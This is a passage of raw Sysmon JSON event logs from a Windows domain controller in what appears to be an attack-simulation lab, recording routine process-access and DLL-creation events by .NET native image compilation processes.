05:58:20.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010FD090D00}","TargetProcessId":"2476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.120\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00101F0E0D00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.120","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00101F0E0D00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.120\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00101F0E0D00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.120","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00101F0E0D00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.136\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00101F0E0D00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.136","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00101F0E0D00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:21.323\r\nProcessGuid: {A837DB8D-047D-5F25-0000-00101F0E0D00}\r\nProcessId: 4148\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1034-0\\Microsoft.Activities.Build.dll\r\nCreationUtcTime: 2020-08-01 05:58:21.323","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:21.323","ProcessGuid":"{A837DB8D-047D-5F25-0000-00101F0E0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1034-0\\Microsoft.Activities.Build.dll","CreationUtcTime":"2020-08-01 05:58:21.323","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.355\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00105A130D00}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.355","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00105A130D00}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.355\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00105A130D00}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.355","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00105A130D00}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.370\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00105A130D00}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.370","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00105A130D00}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.402\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010C5160D00}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.402","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010C5160D00}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen